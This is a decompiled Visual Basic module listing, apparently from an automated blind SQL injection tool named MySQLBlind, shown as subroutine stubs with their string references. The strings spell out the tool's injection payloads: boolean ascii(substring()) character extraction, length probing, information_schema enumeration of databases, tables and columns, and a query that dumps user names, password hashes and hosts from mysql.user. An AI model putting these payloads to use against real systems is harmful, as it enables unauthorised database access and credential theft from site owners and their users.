Attribute VB_Name = "MySQLBlind"
' This code module rebuilt by VBRezQ v3.3a.  2-Feb-2012 / 19:56:23
Option Explicit 
 
'Sub Subr_672()
'N  * ref: __vbaExceptHandler
'N  * ref: Subr_185
'N  * ref: __vbaVarDup
'N  * ref: IIf(
'N  * ref: " "
'N  * ref: "/*!30000"
'N  * ref: IIf(
'N  * ref: Subr_184
'N  * ref: __vbaVarCat
'N  * ref: " %True_Expression%"
'N  * ref: __vbaVarMove
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaStrCmp
'N  * ref: "("
'N  * ref: __vbaVarMove
'N  * ref: " and"
'N  * ref: " "
'N  * ref: __vbaVarDup
'N  * ref: "*/ "
'N  * ref: __vbaVarDup
'N  * ref: IIf(
'N  * ref: "x"
'N  * ref: "="
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaVarDup
'N  * ref: "*/ "
'N  * ref: __vbaVarDup
'N  * ref: IIf(
'N  * ref: "1=1"
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaVarDup
'N  * ref: " and"
'N  * ref: " "
'N  * ref: "*/ "
'N  * ref: IIf(
'N  * ref: "x"
'N  * ref: "="
'N  * ref: __vbaVarMove
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaVarDup
'N  * ref: "*/"
'N  * ref: IIf(
'N  * ref: __vbaVarMove
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaFreeVar
'N  * ref: __vbaFreeVarList
'End Sub
 
'Sub Subr_673()
'N  * ref: __vbaExceptHandler
'N  * ref: Subr_674
'N  * ref: __vbaStrMove
'N  * ref: __vbaStrCat
'N  * ref: "'"
'N  * ref: "'"
'N  * ref: IIf(
'N  * ref: __vbaVarMove
'N  * ref: __vbaFreeStrList
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaFreeVar
'N  * ref: __vbaFreeStrList
'N  * ref: __vbaFreeVarList
'End Sub
 
'Sub Subr_674()
'N  * ref: __vbaExceptHandler
'N  * ref: __vbaLenBstr
'N  * ref: "NULL"
'N  * ref: __vbaStrCopy
'N  * ref: "0x"
'N  * ref: __vbaStrCopy
'N  * ref: __vbaVarForInit
'N  * ref: __vbaVarMove
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaVarCat
'N  * ref: __vbaI4Var
'N  * ref: Mid(
'N  * ref: __vbaStrVarVal
'N  * ref: Asc(
'N  * ref: Hex(
'N  * ref: __vbaFreeStr
'N  * ref: "0"
'N  * ref: __vbaLenVar
'N  * ref: __vbaVarCmpEq
'N  * ref: IIf(
'N  * ref: __vbaStrVarMove
'N  * ref: __vbaStrMove
'N  * ref: __vbaVarForNext
'N  * ref: __vbaFreeStr
'N  * ref: __vbaFreeStr
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaFreeVar
'End Sub
 
'Sub Subr_675()
'N  * ref: __vbaExceptHandler
'N  * ref: __vbaVarDup
'N  * ref: __vbaVarVargNofree
'N  * ref: __vbaVarAdd
'N  * ref: __vbaVargVarMove
'N  * ref: DoEvents
'N  * ref: __vbaVarSub
'N  * ref: __vbaVarTstGt
'N  * ref: __vbaVarDiv
'N  * ref: __vbaVarInt
'N  * ref: __vbaVarAdd
'N  * ref: __vbaVarMove
'N  * ref: __vbaI4Var
'N  * ref: Chr(
'N  * ref: ": "
'N  * ref: __vbaVarCat
'N  * ref: Subr_143
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaVarDup
'N  * ref: " "
'N  * ref: __vbaVarDup
'N  * ref: IIf(
'N  * ref: "ascii(substring"
'N  * ref: "(("
'N  * ref: "),"
'N  * ref: ",1))<"
'N  * ref: __vbaStrVarVal
'N  * ref: "%True_Expression%"
'N  * ref: Replace(
'N  * ref: __vbaStrMove
'N  * ref: __vbaStrCopy
'N  * ref: Subr_151
'N  * ref: __vbaFreeStrList
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaInStr
'N  * ref: __vbaVarCopy
'N  * ref: Subr_675
'N  * ref: __vbaVarMove
'N  * ref: __vbaVarTstLe
'N  * ref: Subr_675
'N  * ref: __vbaVarMove
'N  * ref: __vbaFreeVar
'N  * ref: "?"
'N  * ref: Asc(
'N  * ref: __vbaVarMove
'N  * ref: __vbaVarMove
'N  * ref: __vbaI4Var
'N  * ref: Chr(
'N  * ref: ": "
'N  * ref: __vbaVarCat
'N  * ref: Subr_143
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaVarDup
'N  * ref: " "
'N  * ref: __vbaVarDup
'N  * ref: IIf(
'N  * ref: "ascii(substring"
'N  * ref: "(("
'N  * ref: "),"
'N  * ref: ",1))="
'N  * ref: __vbaStrVarVal
'N  * ref: "%True_Expression%"
'N  * ref: Replace(
'N  * ref: __vbaStrMove
'N  * ref: __vbaStrCopy
'N  * ref: Subr_151
'N  * ref: __vbaFreeStrList
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaInStr
'N  * ref: __vbaVarCopy
'N  * ref: __vbaFreeVar
'N  * ref: __vbaFreeStrList
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaFreeVar
'End Sub
 
'Sub Subr_676()
'N  * ref: __vbaExceptHandler
'N  * ref: __vbaVarVargNofree
'N  * ref: __vbaVarAdd
'N  * ref: __vbaVargVarMove
'N  * ref: __vbaVarSub
'N  * ref: __vbaVarTstGt
'N  * ref: __vbaVarSub
'N  * ref: __vbaVarDiv
'N  * ref: __vbaVarInt
'N  * ref: __vbaVarAdd
'N  * ref: __vbaVarMove
'N  * ref: "Check if length of '"
'N  * ref: "' is <"
'N  * ref: __vbaVarCat
'N  * ref: __vbaVarCat
'N  * ref: __vbaVarCat
'N  * ref: Subr_143
'N  * ref: __vbaFreeVarList
'N  * ref: "Length(("
'N  * ref: "))<"
'N  * ref: __vbaVarCat
'N  * ref: __vbaStrVarVal
'N  * ref: "%True_Expression%"
'N  * ref: Replace(
'N  * ref: __vbaStrMove
'N  * ref: __vbaStrCopy
'N  * ref: Subr_151
'N  * ref: __vbaFreeStrList
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaInStr
'N  * ref: __vbaVargVarCopy
'N  * ref: __vbaVargVarCopy
'N  * ref: __vbaVarTstLe
'N  * ref: "Can not get Length of '"
'N  * ref: "'"
'N  * ref: __vbaVarCat
'N  * ref: Subr_143
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaVarMove
'N  * ref: __vbaVarSub
'N  * ref: __vbaVargVarMove
'N  * ref: "Check if length of '"
'N  * ref: "' is ="
'N  * ref: __vbaVarCat
'N  * ref: __vbaVarCat
'N  * ref: __vbaVarCat
'N  * ref: Subr_143
'N  * ref: __vbaFreeVarList
'N  * ref: "Length(("
'N  * ref: "))="
'N  * ref: __vbaVarCat
'N  * ref: __vbaVarCat
'N  * ref: __vbaVarCat
'N  * ref: __vbaStrVarVal
'N  * ref: "%True_Expression%"
'N  * ref: Replace(
'N  * ref: __vbaStrMove
'N  * ref: __vbaStrCopy
'N  * ref: Subr_151
'N  * ref: __vbaFreeStrList
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaInStr
'N  * ref: "Length of '"
'N  * ref: "' is "
'N  * ref: __vbaVarCat
'N  * ref: Subr_143
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaVarCopy
'N  * ref: Subr_676
'N  * ref: __vbaVarMove
'N  * ref: __vbaFreeVar
'N  * ref: __vbaFreeStrList
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaFreeVar
'End Sub
 
'Sub Subr_677()
'N  * ref: __vbaExceptHandler
'N  * ref: __vbaVarVargNofree
'N  * ref: __vbaVarTstNe
'N  * ref: __vbaStrVarCopy
'N  * ref: __vbaStrMove
'N  * ref: "Find length of '"
'N  * ref: "'"
'N  * ref: __vbaVarCat
'N  * ref: Subr_143
'N  * ref: __vbaFreeVarList
'N  * ref: Subr_676
'N  * ref: __vbaI2Var
'N  * ref: ": "
'N  * ref: __vbaVarVargNofree
'N  * ref: Subr_143
'N  * ref: __vbaLenBstr
'N  * ref: __vbaVarForInit
'N  * ref: ": "
'N  * ref: __vbaVarVargNofree
'N  * ref: Subr_143
'N  * ref: Subr_675
'N  * ref: __vbaI4Var
'N  * ref: Chr(
'N  * ref: __vbaStrVarMove
'N  * ref: __vbaStrMove
'N  * ref: DoEvents
'N  * ref: __vbaVarForNext
'N  * ref: __vbaVarCopy
'N  * ref: __vbaFreeVar
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaFreeVar
'N  * ref: __vbaFreeStr
'N  * ref: __vbaErrorOverflow
'End Sub
 
'Sub Subr_678()
'N  * ref: __vbaExceptHandler
'N  * ref: "Keyword is not effective, if you are sure the target is vulnerable, Try again with a manual keyword"
'N  * ref: __vbaVarDup
'N  * ref: Subr_143
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaStrCmp
'N  * ref: Subr_672
'N  * ref: __vbaStrVarMove
'N  * ref: __vbaStrMove
'N  * ref: __vbaFreeVar
'N  * ref: __vbaVarDup
'N  * ref: "Current DB"
'N  * ref: "database()"
'N  * ref: Subr_677
'N  * ref: __vbaVarMove
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaVarTstNe
'N  * ref: __vbaVarCat
'N  * ref: "Current DB: "
'N  * ref: Subr_143
'N  * ref: __vbaNew2
'N  * ref: __vbaObjSet
'N  * ref: __vbaNew2
'N  * ref: __vbaHresultCheckObj
'N  * ref: __vbaStrCat
'N  * ref: "Current DB: "
'N  * ref: __vbaStrMove
'N  * ref: vbTab
'N  * ref: vbCrLf
'N  * ref: __vbaStrVarVal
'N  * ref: __vbaHresultCheckObj
'N  * ref: __vbaFreeStrList
'N  * ref: __vbaFreeObjList
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaStrVarCopy
'N  * ref: __vbaStrMove
'N  * ref: Subr_169
'N  * ref: __vbaFreeVar
'N  * ref: __vbaVarDup
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaVarTstEq
'N  * ref: "Cannot get current db name!"
'N  * ref: Subr_143
'N  * ref: __vbaFreeVar
'N  * ref: __vbaFreeStrList
'N  * ref: __vbaFreeObjList
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaFreeVar
'End Sub
 
'Sub Subr_679()
'N  * ref: __vbaExceptHandler
'N  * ref: __vbaVarDup
'N  * ref: "Data Base"
'N  * ref: "select distinct schema_name from `information_schema`.schemata limit 0,1"
'N  * ref: Subr_677
'N  * ref: __vbaVarMove
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaVarTstNe
'N  * ref: __vbaNew2
'N  * ref: __vbaObjSet
'N  * ref: __vbaNew2
'N  * ref: __vbaHresultCheckObj
'N  * ref: __vbaStrCat
'N  * ref: "Data Bases: "
'N  * ref: __vbaStrMove
'N  * ref: vbTab
'N  * ref: __vbaVarCat
'N  * ref: vbCrLf
'N  * ref: __vbaStrVarVal
'N  * ref: __vbaHresultCheckObj
'N  * ref: __vbaFreeStrList
'N  * ref: __vbaFreeObjList
'N  * ref: __vbaFreeVarList
'N  * ref: Subr_169
'N  * ref: __vbaFreeVar
'N  * ref: __vbaVarMove
'N  * ref: __vbaVarTstNe
'N  * ref: __vbaVarCopy
'N  * ref: __vbaVarDup
'N  * ref: "Data Base"
'N  * ref: __vbaVarDup
'N  * ref: "select distinct schema_name from `information_schema`.schemata limit "
'N  * ref: ",1"
'N  * ref: Subr_677
'N  * ref: __vbaVarMove
'N  * ref: __vbaVarTstNe
'N  * ref: __vbaNew2
'N  * ref: __vbaObjSet
'N  * ref: __vbaNew2
'N  * ref: __vbaHresultCheckObj
'N  * ref: __vbaStrCat
'N  * ref: vbTab
'N  * ref: __vbaStrMove
'N  * ref: vbTab
'N  * ref: vbCrLf
'N  * ref: __vbaStrVarVal
'N  * ref: __vbaHresultCheckObj
'N  * ref: __vbaFreeStrList
'N  * ref: __vbaFreeObjList
'N  * ref: __vbaFreeVarList
'N  * ref: Subr_169
'N  * ref: __vbaFreeVar
'N  * ref: __vbaVarAdd
'N  * ref: __vbaFreeVar
'N  * ref: __vbaFreeStrList
'N  * ref: __vbaFreeObjList
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaFreeVar
'End Sub
 
'Sub Subr_680()
'N  * ref: __vbaExceptHandler
'N  * ref: __vbaVarDup
'N  * ref: "Current User"
'N  * ref: "user()"
'N  * ref: Subr_677
'N  * ref: __vbaStrVarMove
'N  * ref: __vbaStrMove
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaStrCmp
'N  * ref: __vbaNew2
'N  * ref: __vbaObjSet
'N  * ref: __vbaNew2
'N  * ref: __vbaHresultCheckObj
'N  * ref: "Current User: "
'N  * ref: __vbaStrCat
'N  * ref: vbTab
'N  * ref: __vbaStrCat
'N  * ref: __vbaStrCat
'N  * ref: vbCrLf
'N  * ref: __vbaStrCat
'N  * ref: __vbaHresultCheckObj
'N  * ref: __vbaFreeStrList
'N  * ref: __vbaFreeObjList
'N  * ref: "Version"
'N  * ref: "version()"
'N  * ref: Subr_677
'N  * ref: __vbaStrVarMove
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaStrCmp
'N  * ref: __vbaNew2
'N  * ref: __vbaObjSet
'N  * ref: __vbaNew2
'N  * ref: __vbaHresultCheckObj
'N  * ref: "Sql Version: "
'N  * ref: __vbaStrCat
'N  * ref: vbTab
'N  * ref: __vbaStrCat
'N  * ref: __vbaStrCat
'N  * ref: vbCrLf
'N  * ref: __vbaStrCat
'N  * ref: __vbaHresultCheckObj
'N  * ref: __vbaFreeStrList
'N  * ref: __vbaFreeObjList
'N  * ref: "Current DB"
'N  * ref: "database()"
'N  * ref: Subr_677
'N  * ref: __vbaStrVarMove
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaStrCmp
'N  * ref: __vbaNew2
'N  * ref: __vbaObjSet
'N  * ref: __vbaNew2
'N  * ref: __vbaHresultCheckObj
'N  * ref: "Current DB: "
'N  * ref: __vbaStrCat
'N  * ref: vbTab
'N  * ref: __vbaStrCat
'N  * ref: __vbaStrCat
'N  * ref: vbCrLf
'N  * ref: __vbaStrCat
'N  * ref: __vbaHresultCheckObj
'N  * ref: __vbaFreeStrList
'N  * ref: __vbaFreeObjList
'N  * ref: "System User"
'N  * ref: "system_user()"
'N  * ref: Subr_677
'N  * ref: __vbaStrVarMove
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaStrCmp
'N  * ref: __vbaNew2
'N  * ref: __vbaObjSet
'N  * ref: __vbaNew2
'N  * ref: __vbaHresultCheckObj
'N  * ref: "System User: "
'N  * ref: __vbaStrCat
'N  * ref: vbTab
'N  * ref: __vbaStrCat
'N  * ref: __vbaStrCat
'N  * ref: vbCrLf
'N  * ref: __vbaStrCat
'N  * ref: __vbaHresultCheckObj
'N  * ref: __vbaFreeStrList
'N  * ref: __vbaFreeObjList
'N  * ref: "Host Name"
'N  * ref: "@@hostname"
'N  * ref: Subr_677
'N  * ref: __vbaStrVarMove
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaStrCmp
'N  * ref: __vbaNew2
'N  * ref: __vbaObjSet
'N  * ref: __vbaNew2
'N  * ref: __vbaHresultCheckObj
'N  * ref: "Host Name: "
'N  * ref: __vbaStrCat
'N  * ref: vbTab
'N  * ref: __vbaStrCat
'N  * ref: __vbaStrCat
'N  * ref: vbCrLf
'N  * ref: __vbaStrCat
'N  * ref: __vbaHresultCheckObj
'N  * ref: __vbaFreeStrList
'N  * ref: __vbaFreeObjList
'N  * ref: "Installation dir"
'N  * ref: "@@basedir"
'N  * ref: Subr_677
'N  * ref: __vbaStrVarMove
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaStrCmp
'N  * ref: __vbaNew2
'N  * ref: __vbaObjSet
'N  * ref: __vbaNew2
'N  * ref: __vbaHresultCheckObj
'N  * ref: "Installation dir: "
'N  * ref: __vbaStrCat
'N  * ref: vbTab
'N  * ref: __vbaStrCat
'N  * ref: __vbaStrCat
'N  * ref: vbCrLf
'N  * ref: __vbaStrCat
'N  * ref: __vbaHresultCheckObj
'N  * ref: __vbaFreeStrList
'N  * ref: __vbaFreeObjList
'N  * ref: "DB User & Pass"
'N  * ref: "select concat(user,0x3a,password,0x3a,host) from mysql.user limit 0,1"
'N  * ref: Subr_677
'N  * ref: __vbaStrVarMove
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaStrCmp
'N  * ref: __vbaNew2
'N  * ref: __vbaObjSet
'N  * ref: __vbaNew2
'N  * ref: __vbaHresultCheckObj
'N  * ref: "DB User & Pass: "
'N  * ref: __vbaStrCat
'N  * ref: vbTab
'N  * ref: __vbaStrCat
'N  * ref: __vbaStrCat
'N  * ref: vbCrLf
'N  * ref: __vbaStrCat
'N  * ref: __vbaHresultCheckObj
'N  * ref: __vbaFreeStrList
'N  * ref: __vbaFreeObjList
'N  * ref: __vbaVarMove
'N  * ref: __vbaVarCat
'N  * ref: __vbaStrCmp
'N  * ref: "DB User & Pass"
'N  * ref: "select concat(user,0x3a,password,0x3a,host) from mysql.user limit "
'N  * ref: ",1"
'N  * ref: Subr_677
'N  * ref: __vbaStrVarMove
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaStrCmp
'N  * ref: __vbaNew2
'N  * ref: __vbaObjSet
'N  * ref: __vbaNew2
'N  * ref: __vbaHresultCheckObj
'N  * ref: vbTab
'N  * ref: __vbaStrCat
'N  * ref: vbTab
'N  * ref: __vbaStrCat
'N  * ref: __vbaStrCat
'N  * ref: vbCrLf
'N  * ref: __vbaStrCat
'N  * ref: __vbaHresultCheckObj
'N  * ref: __vbaFreeStrList
'N  * ref: __vbaFreeObjList
'N  * ref: __vbaVarCat
'N  * ref: __vbaVarAdd
'N  * ref: __vbaVarMove
'N  * ref: "DB User"
'N  * ref: "select distinct GRANTEE from `information_schema`.user_privileges limit 0,1"
'N  * ref: Subr_677
'N  * ref: __vbaStrVarMove
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaStrCmp
'N  * ref: __vbaNew2
'N  * ref: __vbaObjSet
'N  * ref: __vbaNew2
'N  * ref: __vbaHresultCheckObj
'N  * ref: "DB User: "
'N  * ref: __vbaStrCat
'N  * ref: vbTab
'N  * ref: __vbaStrCat
'N  * ref: __vbaStrCat
'N  * ref: vbCrLf
'N  * ref: __vbaStrCat
'N  * ref: __vbaHresultCheckObj
'N  * ref: __vbaFreeStrList
'N  * ref: __vbaFreeObjList
'N  * ref: __vbaVarMove
'N  * ref: __vbaStrCmp
'N  * ref: "DB User"
'N  * ref: "select distinct GRANTEE from `information_schema`.user_privileges limit "
'N  * ref: ",1"
'N  * ref: __vbaVarCat
'N  * ref: __vbaVarCat
'N  * ref: Subr_677
'N  * ref: __vbaStrVarMove
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaStrCmp
'N  * ref: __vbaNew2
'N  * ref: __vbaObjSet
'N  * ref: __vbaNew2
'N  * ref: __vbaHresultCheckObj
'N  * ref: vbTab
'N  * ref: __vbaStrCat
'N  * ref: vbTab
'N  * ref: __vbaStrCat
'N  * ref: __vbaStrCat
'N  * ref: vbCrLf
'N  * ref: __vbaStrCat
'N  * ref: __vbaHresultCheckObj
'N  * ref: __vbaFreeStrList
'N  * ref: __vbaFreeObjList
'N  * ref: __vbaVarAdd
'N  * ref: Subr_679
'N  * ref: __vbaFreeVar
'N  * ref: __vbaFreeVar
'N  * ref: __vbaFreeStrList
'N  * ref: __vbaFreeObjList
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaFreeVar
'N  * ref: __vbaFreeStr
'End Sub
 
'Sub Subr_681()
'N  * ref: __vbaExceptHandler
'N  * ref: __vbaChkstk
'N  * ref: __vbaOnError
'N  * ref: __vbaVarVargNofree
'N  * ref: __vbaVarCopy
'N  * ref: __vbaVarTstLt
'N  * ref: __vbaVarMove
'N  * ref: Subr_673
'N  * ref: "Table Name"
'N  * ref: __vbaVarDup
'N  * ref: "select distinct table_name from `information_schema`.tables where table_schema="
'N  * ref: " limit "
'N  * ref: ",1"
'N  * ref: __vbaVarCat
'N  * ref: __vbaVarCat
'N  * ref: __vbaVarCat
'N  * ref: __vbaVarCat
'N  * ref: Subr_677
'N  * ref: __vbaStrVarMove
'N  * ref: __vbaStrMove
'N  * ref: __vbaFreeVarList
'N  * ref: "SELECT command denied to user "
'N  * ref: __vbaInStr
'N  * ref: "The current user doesn't have enough privileges! Trying to guess tables!"
'N  * ref: __vbaVarDup
'N  * ref: Subr_143
'N  * ref: __vbaFreeVarList
'N  * ref: Subr_242
'N  * ref: __vbaFreeVar
'N  * ref: __vbaStrCmp
'N  * ref: "It seems information_schema table does not exist! Trying to guess tables!"
'N  * ref: __vbaVarDup
'N  * ref: Subr_143
'N  * ref: __vbaFreeVarList
'N  * ref: Subr_242
'N  * ref: __vbaFreeVar
'N  * ref: __vbaStrCmp
'N  * ref: __vbaNew2
'N  * ref: __vbaObjSet
'N  * ref: __vbaLateIdCallLd
'N  * ref: __vbaCastObjVar
'N  * ref: __vbaObjSet
'N  * ref: __vbaHresultCheckObj
'N  * ref: __vbaCastObj
'N  * ref: __vbaObjSet
'N  * ref: __vbaFreeObjList
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaNew2
'N  * ref: __vbaObjSet
'N  * ref: __vbaLateIdCallLd
'N  * ref: __vbaCastObjVar
'N  * ref: __vbaObjSet
'N  * ref: __vbaHresultCheckObj
'N  * ref: __vbaObjSet
'N  * ref: __vbaHresultCheckObj
'N  * ref: __vbaFreeObjList
'N  * ref: __vbaFreeVar
'N  * ref: __vbaHresultCheckObj
'N  * ref: "."
'N  * ref: __vbaStrCat
'N  * ref: __vbaStrMove
'N  * ref: __vbaStrCat
'N  * ref: __vbaStrMove
'N  * ref: __vbaHresultCheckObj
'N  * ref: __vbaFreeStrList
'N  * ref: __vbaVarAdd
'N  * ref: __vbaVarMove
'N  * ref: __vbaStrCmp
'N  * ref: Subr_673
'N  * ref: "Table Name"
'N  * ref: __vbaVarDup
'N  * ref: "select distinct table_name from `information_schema`.tables where table_schema="
'N  * ref: " limit "
'N  * ref: ",1"
'N  * ref: __vbaVarCat
'N  * ref: __vbaVarCat
'N  * ref: __vbaVarCat
'N  * ref: __vbaVarCat
'N  * ref: Subr_677
'N  * ref: __vbaStrVarMove
'N  * ref: __vbaStrMove
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaStrCmp
'N  * ref: __vbaNew2
'N  * ref: __vbaObjSet
'N  * ref: __vbaLateIdCallLd
'N  * ref: __vbaCastObjVar
'N  * ref: __vbaObjSet
'N  * ref: __vbaHresultCheckObj
'N  * ref: __vbaCastObj
'N  * ref: __vbaObjSet
'N  * ref: __vbaFreeObjList
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaNew2
'N  * ref: __vbaObjSet
'N  * ref: __vbaLateIdCallLd
'N  * ref: __vbaCastObjVar
'N  * ref: __vbaObjSet
'N  * ref: __vbaHresultCheckObj
'N  * ref: __vbaObjSet
'N  * ref: __vbaHresultCheckObj
'N  * ref: __vbaFreeObjList
'N  * ref: __vbaFreeVar
'N  * ref: __vbaHresultCheckObj
'N  * ref: "."
'N  * ref: __vbaStrCat
'N  * ref: __vbaStrMove
'N  * ref: __vbaStrCat
'N  * ref: __vbaStrMove
'N  * ref: __vbaHresultCheckObj
'N  * ref: __vbaFreeStrList
'N  * ref: __vbaVarAdd
'N  * ref: __vbaVarMove
'N  * ref: __vbaFreeVar
'N  * ref: __vbaFreeStrList
'N  * ref: __vbaFreeObjList
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaFreeObj
'N  * ref: __vbaFreeVar
'N  * ref: __vbaFreeStr
'End Sub
 
'Sub Subr_682()
'N  * ref: __vbaExceptHandler
'N  * ref: __vbaVarVargNofree
'N  * ref: __vbaVarCopy
'N  * ref: __vbaVarTstLt
'N  * ref: __vbaVarMove
'N  * ref: Subr_673
'N  * ref: Subr_673
'N  * ref: __vbaVarDup
'N  * ref: "Column Name"
'N  * ref: __vbaVarCat
'N  * ref: "select distinct column_name from `information_schema`.columns where table_schema="
'N  * ref: " and table_name="
'N  * ref: " limit "
'N  * ref: ",1"
'N  * ref: Subr_677
'N  * ref: __vbaStrVarMove
'N  * ref: __vbaStrMove
'N  * ref: __vbaFreeVarList
'N  * ref: "SELECT command denied to user "
'N  * ref: __vbaInStr
'N  * ref: "The current user doesn't have enough privileges! Trying to guess tables!"
'N  * ref: Subr_143
'N  * ref: __vbaFreeVarList
'N  * ref: Subr_242
'N  * ref: __vbaFreeVar
'N  * ref: __vbaStrCmp
'N  * ref: "It seems information_schema table does not exist! Trying to guess columns!"
'N  * ref: Subr_143
'N  * ref: __vbaFreeVarList
'N  * ref: Subr_243
'N  * ref: __vbaFreeVar
'N  * ref: __vbaStrCmp
'N  * ref: __vbaNew2
'N  * ref: __vbaObjSet
'N  * ref: __vbaLateIdCallLd
'N  * ref: __vbaCastObjVar
'N  * ref: __vbaHresultCheckObj
'N  * ref: __vbaCastObj
'N  * ref: __vbaFreeObjList
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaHresultCheckObj
'N  * ref: __vbaNew2
'N  * ref: __vbaLateIdCallLd
'N  * ref: __vbaCastObjVar
'N  * ref: "."
'N  * ref: __vbaStrCat
'N  * ref: __vbaStrMove
'N  * ref: __vbaStrCat
'N  * ref: __vbaHresultCheckObj
'N  * ref: __vbaHresultCheckObj
'N  * ref: __vbaFreeStr
'N  * ref: __vbaFreeObjList
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaVarAdd
'N  * ref: __vbaVarMove
'N  * ref: __vbaStrCmp
'N  * ref: Subr_673
'N  * ref: Subr_673
'N  * ref: "Column Name"
'N  * ref: __vbaVarDup
'N  * ref: "select distinct column_name from `information_schema`.columns where table_schema="
'N  * ref: " and table_name="
'N  * ref: " limit "
'N  * ref: ",1"
'N  * ref: Subr_677
'N  * ref: __vbaStrVarMove
'N  * ref: __vbaStrMove
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaNew2
'N  * ref: __vbaLateIdCallLd
'N  * ref: __vbaCastObjVar
'N  * ref: __vbaHresultCheckObj
'N  * ref: __vbaCastObj
'N  * ref: __vbaFreeObjList
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaHresultCheckObj
'N  * ref: __vbaNew2
'N  * ref: __vbaLateIdCallLd
'N  * ref: __vbaCastObjVar
'N  * ref: "."
'N  * ref: __vbaStrCat
'N  * ref: __vbaStrMove
'N  * ref: __vbaStrCat
'N  * ref: __vbaHresultCheckObj
'N  * ref: __vbaHresultCheckObj
'N  * ref: __vbaFreeStr
'N  * ref: __vbaFreeObjList
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaStrCmp
'N  * ref: __vbaVarAdd
'N  * ref: __vbaVarMove
'N  * ref: __vbaFreeVar
'N  * ref: __vbaFreeStr
'N  * ref: __vbaFreeObjList
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaFreeObj
'N  * ref: __vbaFreeVar
'N  * ref: __vbaFreeStr
'End Sub
 
'Sub Subr_683()
'N  * ref: __vbaExceptHandler
'N  * ref: __vbaVarDup
'N  * ref: " where "
'N  * ref: __vbaVarCmpNe
'N  * ref: __vbaVarMove
'N  * ref: __vbaVarCat
'N  * ref: IIf(
'N  * ref: "Row Count"
'N  * ref: __vbaStrCat
'N  * ref: "select count("
'N  * ref: __vbaStrMove
'N  * ref: ") from "
'N  * ref: "."
'N  * ref: __vbaVarCat
'N  * ref: Subr_677
'N  * ref: __vbaVarMove
'N  * ref: __vbaFreeStrList
'N  * ref: __vbaFreeVarList
'N  * ref: IsNumeric(
'N  * ref: __vbaVarCopy
'N  * ref: __vbaStrVarVal
'N  * ref: Val(
'N  * ref: __vbaFpI4
'N  * ref: __vbaFreeStr
'N  * ref: __vbaVarTstNe
'N  * ref: __vbaStrVarVal
'N  * ref: Val(
'N  * ref: __vbaFpI4
'N  * ref: __vbaFreeStr
'N  * ref: __vbaVarDup
'N  * ref: " where "
'N  * ref: __vbaStrCmp
'N  * ref: IIf(
'N  * ref: "Count("
'N  * ref: ") of "
'N  * ref: "."
'N  * ref: __vbaVarCat
'N  * ref: " is "
'N  * ref: Subr_143
'N  * ref: __vbaFreeStrList
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaVarDup
'N  * ref: " where "
'N  * ref: __vbaStrCmp
'N  * ref: IIf(
'N  * ref: "Can not get Count("
'N  * ref: ") of "
'N  * ref: "."
'N  * ref: __vbaVarCat
'N  * ref: Subr_143
'N  * ref: __vbaFreeStrList
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaFreeStrList
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaFreeVar
'End Sub
 
'Sub Subr_684()
'N  * ref: __vbaExceptHandler
'N  * ref: __vbaStrCmp
'N  * ref: IsArray(
'N  * ref: __vbaRefVarAry
'N  * ref: __vbaUbound
'N  * ref: __vbaVarForInit
'N  * ref: __vbaVarMove
'N  * ref: __vbaVarCat
'N  * ref: "."
'N  * ref: ",0x5e,"
'N  * ref: __vbaVarIndexLoad
'N  * ref: __vbaFreeVarList
'N  * ref: ","
'N  * ref: __vbaVarIndexLoad
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaVarForNext
'N  * ref: __vbaLenVar
'N  * ref: __vbaVarSub
'N  * ref: __vbaI4Var
'N  * ref: Left(
'N  * ref: __vbaLenVar
'N  * ref: __vbaVarSub
'N  * ref: __vbaI4Var
'N  * ref: Left(
'N  * ref: __vbaVarDup
'N  * ref: " where "
'N  * ref: __vbaStrCat
'N  * ref: __vbaStrCmp
'N  * ref: IIf(
'N  * ref: __vbaVarDup
'N  * ref: "Column Data"
'N  * ref: __vbaVarDup
'N  * ref: "select concat("
'N  * ref: ") from "
'N  * ref: "."
